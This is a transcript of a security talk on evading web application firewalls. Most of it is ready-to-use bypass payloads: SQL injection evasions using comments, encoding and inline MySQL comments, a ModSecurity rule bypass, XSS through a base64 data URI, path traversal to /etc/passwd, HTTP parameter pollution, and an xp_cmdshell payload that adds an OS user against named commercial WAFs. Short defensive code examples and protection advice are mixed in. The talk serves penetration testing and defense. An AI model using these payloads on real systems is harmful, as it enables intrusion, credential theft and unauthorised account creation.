Web Application Firewall: Suckseed or Succeed
Transcript of Web Application Firewall: Suckseed or Succeed
Web Application Firewall (WAF): Suckseed or Succeed !?
Mr. Prathan Phongthiproek, Consulting Manager, Red Team, ACIS Professional Center
Who am I ?
ACIS Professional Center
Manager of the Red Team
Specializing in Attack & Penetration
Information Security Consulting Manager
Instructor and Speaker
Founder of CWH Underground Hacker
Aka 0x7a657133756c
Let’s Reveal
Introduction to Web Application Firewall (WAF)
Breach it !! Filter Evasion
HTTP Parameter Contamination
HTTP Pollution: Split and Join
Conclusion
Introduction to Web Application Firewall (WAF)
Web Application Hacking
7 of 10 sites are vulnerable
70% of Cyber attacks are on web ports
95% of companies are hacked through web ports
Anonymous and Lulzsec
Hacker with Operation
#AntiSec
Web Application Hacking
Top 3 Web App Attacks
Cross Site Scripting
File Inclusion (Remote/Local)
SQL Injection (Normal/Blind/Time based/Regex...)
Misconceptions about hardening a web application
What’s WAF ?
Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
Usually contain a lot of complex regex rules to match against (blacklist)
For most WAF vendors these rules are “closely guarded secrets”
Open-source WAFs (ModSecurity and PHPIDS) have open-source rules
Understand Blacklist
Detection and Protection
SQL Injection
Cross Site Scripting
Local and Remote File Inclusion
Code/Command Injection
Directory Traversal
Buffer Overflow
Cookie Poisoning
Parameter Tampering
Upload File Mis-Handling
Information Disclosure
Etc...
WAF Vendors
Armorize
Barracuda
Cisco ACE
Citrix Netscaler
F5
Imperva SecureSphere
Radware Appwall
Profense
Bee-ware
BinarySec
Mod Security
WebKnight
DenyAll
Fortify
Visonys
Pentasecurity
Other..
WAF implementation
Breach it !! (CMS and WAFs)
“Under control, under control...... it’s burst”
Filter Evasion (SQLi)
PHP: magic_quotes on, mysql_real_escape_string(), addslashes()
' " -> \' \"
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
Filter Evasion (SQLi)
PHP: magic_quotes on, mysql_real_escape_string(), addslashes()
' " -> \' \"
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
Filter Evasion (SQLi)
PHP: magic_quotes on, mysql_real_escape_string(), addslashes()
String to ASCII codes via CHAR()
id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
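The escaping on these slides can be sidestepped because it only protects quoted string contexts, while id is embedded as a bare number. The following is an added example, not from the slides: a constructed SQLite stand-in for the PHP page (schema, rows and function names are made up) that shows the slide's CHAR() technique passing an addslashes()-style filter unchanged, next to the two fixes that hold, binding the value and enforcing its type.

```python
import sqlite3

# Constructed stand-in for the slide's PHP page: escaping in front of a
# query that embeds id as a bare number. Schema and rows are made up.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE news(id INTEGER, title TEXT);
CREATE TABLE users(id INTEGER, name TEXT, password TEXT);
INSERT INTO news VALUES (1, 'hello');
""")

# The slide's technique with SQLite's catalogue standing in for
# information_schema: char(117,115,101,114,115) spells 'users' with no quotes.
PAYLOAD = ("1 and 1=2 union select 1,sql from sqlite_master "
           "where name=char(117,115,101,114,115)")


def addslashes(value: str) -> str:
    """What magic_quotes / addslashes() do: escape quotes, backslash and NUL."""
    value = value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return value.replace("\x00", "\\0")


def lookup_escaped(raw_id: str):
    """Escaping only matters inside quotes; id is unquoted, so it changes nothing."""
    sql = "SELECT id, title FROM news WHERE id=" + addslashes(raw_id)
    return DB.execute(sql).fetchone()


def lookup_parameterized(raw_id):
    """Bind the value instead: whatever it contains can never become SQL."""
    return DB.execute("SELECT id, title FROM news WHERE id=?", (raw_id,)).fetchone()


def lookup_typed(raw_id: str):
    """Enforce the type the application expects before the query is built;
    int() rejects the payload outright with a ValueError."""
    return lookup_parameterized(int(raw_id))
```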
Filter Evasion (SQLi)
Comments //,--,/**/,/*,#,%00
id=1+un/**/ion+se/**/lect+1,2,3--
Case changing (the regex matches lower case only)
/union\sselect/g
id=1+UnIoN/**/SeLecT/**/1,2,3--
Replaced keywords
id=1+UnunionIoN+SeselectLecT+1,2,3--
Filter Evasion (SQLi)
Case Study: NukeSentinel (PHP Nuke)
Encode to Hex
Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......
Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......
Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
Filter Evasion (SQLi)
Buffer Overflow (for WAFs written in C)
id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--
Filter Evasion (SQLi)
Inline Comments (/*!......*/)
A lot of WAFs were bypassed
Bypasses IPS and timeouts
MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)
/union\sselect/ig
id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
Filter Evasion (SQLi)
Censor
Filter Evasion (SQLi)
Other Bypasses (equivalent substitutions):
and -> &&
or -> ||
= -> like
substring() -> substr(), mid(), strcmp()
ascii() -> hex(), bin(), char(), ord()
benchmark() -> sleep()
Whitespace -> (),/**/,%0b
isnull, between
Filter Evasion (SQLi)
Case Study: PHPIDS
Filter Evasion (SQLi)
Case Study: Mod Security CRS
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \
"phase:2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
![Page 28: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/28.jpg)
Filter Evasion (SQLi)
Case Study: Mod Security CRS
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*bar\r\nselect#foo\r\n1,2,current_user
0 div 1 union select 1,2,current_user
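To make the gap concrete, the following added example (not from the slides or from ModSecurity; the transformation functions are simplified re-implementations of the named CRS transformations, and RAW_ID is the slide's id value) normalizes the request the way the rule's transformation chain does and the way MySQL's parser does, then runs the rule's regex on both views:

```python
import re
from urllib.parse import unquote

# The CRS rule from the slide, reduced to its regex; t:lowercase has already
# run by the time it is applied, so the pattern itself is lower case.
UNION_SELECT = re.compile(r"\bunion\b.{1,100}?\bselect\b", re.S)

# Constructed from the slide's URL: the raw value of the id parameter.
RAW_ID = "0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user"


def t_replace_comments(s: str) -> str:
    """Simplified ModSecurity t:replaceComments: each /*...*/ becomes one
    space, and an unterminated /* swallows everything after it."""
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"/\*.*", " ", s, flags=re.S)


def crs_view(raw: str) -> str:
    """The string the regex is actually run against after t:urlDecodeUni,
    t:lowercase, t:replaceComments and t:compressWhiteSpace."""
    s = unquote(raw.replace("+", " ")).lower()
    return re.sub(r"\s+", " ", t_replace_comments(s))


def mysql_view(raw: str) -> str:
    """What the MySQL parser effectively sees: a '#' comment runs to the end
    of the line and a /*...*/ comment is only a token separator."""
    s = unquote(raw.replace("+", " ")).lower()
    s = re.sub(r"#[^\r\n]*", " ", s)          # '#' line comments
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip()


def rule_fires(view: str) -> bool:
    """True when the rule's regex matches the given normalized view."""
    return UNION_SELECT.search(view) is not None
```

The defensive takeaway is that the WAF has to strip every comment form the backend parser strips, '#' line comments included, before its patterns run.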
![Page 29: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/29.jpg)
Filter Evasion
Cross Site Scripting (XSS)
Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')
Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
File Inclusion
Forbidden: http://victim.com/download.php?file=../../../etc/passwd
Bypass: http://victim.com/download.php?file=../../../etc/passwd..........
Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
![Page 30: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/30.jpg)
HTTP Parameter Contamination
![Page 31: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/31.jpg)
HTTP Parameter Contamination
Bypass Mod_Security SQLi rule (modsecurity_crs_41)
Bypass URLScan 3.1 DenyQueryStringSequences rules
Bypass AQTRONIX Webknight WAF with “%”
![Page 32: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/32.jpg)
HTTP Parameter Contamination
Case Study: AQTRONIX Webknight
http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 and 1=0/(select top 1 table_name from information_schema.tables)
![Page 33: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/33.jpg)
HTTP Pollution: Split and Join
HPP is a quite simple but effective attack technique
HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string delimiters
Focus on ASP/ASP.NET
A lot of WAFs were bypassed
![Page 34: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/34.jpg)
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join
Basic Attack
Forbidden: http://victim.com/search.aspx?q=select name,password from user
Bypass: http://victim.com/search.aspx?q=select name&q=password from user
q=select name
q=password from user
q=select name,password from user
![Page 38: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/38.jpg)
HTTP Pollution: Split and Join
HPP+Inline Comment (Bypass Commercial WAF)
Forbidden: http://victim.com/search.aspx?q=select name,password from user
Bypass: http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user
q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/user
q=select/*,*/name,password/*,*/from/*,*/user
q=select name,password from user
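As an added example (not from the slides), the following models the ASP/ASP.NET behaviour both the basic and the inline-comment variant rely on, every duplicate of q joined with a comma, and shows that a rule run on each duplicate separately misses what the backend actually receives, while inspecting the joined, comment-stripped value catches both. The query strings are the slide's, the rule regex and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed from the slide's URLs: the query strings as the WAF sees them.
BASIC = "q=select name&q=password from user"
INLINE = "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user"

# The kind of rule the slide says was bypassed, applied to one value.
SELECT_FROM = re.compile(r"\bselect\b.{1,100}?\bfrom\b", re.I)


def split_params(query: str) -> dict:
    """Every occurrence of every parameter, in order, before any joining."""
    params = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        params.setdefault(name, []).append(value)
    return params


def backend_view(values: list) -> str:
    """What ASP/ASP.NET hands the application: duplicates joined with ',',
    after which the database treats each /*...*/ as a token separator."""
    joined = ",".join(values)
    return re.sub(r"/\*.*?\*/", " ", joined, flags=re.S)


def rule_fires(query: str, per_value: bool) -> bool:
    """per_value=True inspects each duplicate on its own (the bypassed WAF);
    per_value=False inspects the value the backend will actually receive."""
    for values in split_params(query).values():
        views = values if per_value else [backend_view(values)]
        if any(SELECT_FROM.search(v) for v in views):
            return True
    return False
```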
HTTP Pollution: Split and Join
Case study: IBM Web Application Firewall (2011-6-21)
Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT /add" --
Bypass: http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ "net user lucifer UrWaFisShiT" /*&id=1*/ --
id=1'; /*
id=1*/ EXEC /*
id=1*/ master..xp_cmdshell /*
id=1*/ "net user lucifer UrWaFisShiT" /*
id=1*/ --
id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "net user lucifer UrWaFisShiT" /*,1*/ --
id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT" --
![Page 41: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/41.jpg)
“Thailand needs change. It is time for everyone in the country to wake up; ignorance must come to an end.”
![Page 42: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/42.jpg)
How to protect your website ?
Implement Secure Software Development Life Cycle (SSDLC)
Secure Coding: Validate all inputs and outputs
Pentest before going online
Harden it !!
Re-visit Again
Deploy WAF (Optional)
![Page 43: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/43.jpg)
Conclusion
WAF is not the long-expected
Because of its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities
It’s necessary to adapt the WAF filter to the particular web app being protected
A WAF doesn’t eliminate a vulnerability, it just partly screens the attack vector
It suckseed or succeed !?
“Security products are not able to 100% protect from the damn config/coding of admins. It just needs time and imagination to breach it !!”
![Page 44: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/44.jpg)
Greetz To..
ACIS-Red Team
Kyle
Johannes Dahse
Ahmad Maulana
Luca Carettoni
Stefano di Paola
Ivan Markovic
All WAF products that I breached